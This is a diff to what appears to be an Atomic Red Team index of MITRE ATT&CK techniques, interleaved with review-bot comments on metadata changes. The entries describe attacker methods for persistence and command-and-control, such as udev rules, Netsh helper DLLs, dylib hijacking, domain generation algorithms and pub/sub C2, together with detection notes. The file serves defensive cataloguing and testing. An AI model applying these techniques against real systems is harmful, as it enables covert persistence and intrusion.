+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
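Review bot: the two unchanged context lines at the end of this hunk, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref`, now belong to the new T1546.017 object rather than to T1556, because the added block is inserted between T1556's `object_marking_refs` and those keys; T1556 gets its own copies earlier (see the `+` lines in the two preceding hunks), so both objects end up complete, but a reader of this hunk alone could conclude T1556 lost them. On the new entry itself: the `x_mitre_detection` text names only three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, `/usr/lib/udev/rules.d/`) while the description lists five, omitting `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`, and one path is missing its backticks; a file-modification monitor derived from the detection field alone would therefore miss two of the directories the technique covers. That text is upstream ATT&CK's, so raise it there; here it is enough to note that T1546.017 lands with `atomic_tests: []` and no test yet.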
@@ -40221,7 +40656,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
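Review bot: the `modified` timestamp for T1546.007 moves backwards here, from 2022-05-11 to 2022-04-20, and the same regression appears for T1556.004, T1574.004, T1574.012, T1205.002, T1568.001, T1205, T1572 and T1090 later in the patch. A regressing `modified` value usually means the index was regenerated from a different source bundle, or that the old values were synthetic refresh stamps (most of the removed ones share the suffix `14:00:00.188Z`); state which ATT&CK STIX release the index was rebuilt from so the change is auditable.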
@@ -40245,51 +40680,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
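Review bot: the 40-line removal from `x_mitre_platforms` down to `modified` in T1505.001 is not a content change; the same keys come back in the next hunk in a different order (`modified`, `name` and `description` first, `external_references` and `object_marking_refs` last). Emitting keys in a fixed order in the generator would shrink this to the lines that actually change: `modified`, `x_mitre_version`, the two NetSPI URLs and the dropped `x_mitre_permissions_required`.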
@@ -40312,20 +40707,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
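Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root) is removed from T1505.001 with nothing replacing it, while `x_mitre_version` goes to 1.1 and `x_mitre_attack_spec_version` to 3.2.0; if the field was retired upstream that is expected, but the PR should say so, since Atomic Red Team tooling that filters techniques by required privilege silently loses the value. The two NetSPI references now point at www.netspi.com/blog/technical-blog/... with retrieval date September 12, 2024, which is consistent with the object's new `modified` date of 2024-10-15.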
@@ -40355,7 +40787,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -40379,12 +40811,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
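Review bot: for T1556.004 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with no replacement, whereas T1078.003 later in this patch has its `x_mitre_attack_spec_version` bumped from 3.1.0 to 3.2.0 and keeps the key. The same drop-without-replacement happens for T1574.012, T1568.001 and T1572 (all previously on 2.1.0). Unless a hunk outside this view re-adds the key, those entries end up with no attack spec version at all; check the generated file, and if the generator only emits the key for objects on spec 3.x, document that behaviour.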
@@ -40468,11 +40898,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -40524,9 +40953,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges - MacOS
@@ -40633,7 +41061,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -40671,14 +41099,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -40741,7 +41167,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -40799,7 +41224,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests:
- name: Base64 Encoded data.
@@ -40826,92 +41250,91 @@ command-and-control:
name: sh
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
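Review bot: the 'Akamai DGA Mitigation' reference URL changes from blogs.akamai.com to a personal medium.com/@yvyuz post while the citation text still credits Akamai; keep the original URL or a web.archive.org copy alongside it (as the T1574.012 COR_PROFILER entry already does for its subt0x10 source) rather than pointing a vendor citation at an individual's blog. The rest of this hunk is the same key reorder as T1505.001, plus `x_mitre_version` 1.0 to 1.1, `revoked: false` and `x_mitre_deprecated: false` added, and `x_mitre_permissions_required: User` dropped.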
@@ -40977,9 +41400,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
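Review bot: in the new T1071.005 entry the double-quoted `description` scalar is shown broken across lines at `MQTT`, `XMPP`, `AMQP` and `STOMP`, with those fragments lacking the `+` marker; check that the committed YAML keeps the scalar on continuous `+` lines, otherwise the quoted string is unterminated and the whole index fails to parse. Also `x_mitre_detection: ''` is empty for this technique, so tooling that renders the detection field must tolerate the empty string; the listed data sources (Network Traffic Flow and Network Traffic Content) are the only detection guidance the entry carries.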
@@ -41025,7 +41506,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -41057,7 +41537,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -41079,22 +41559,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
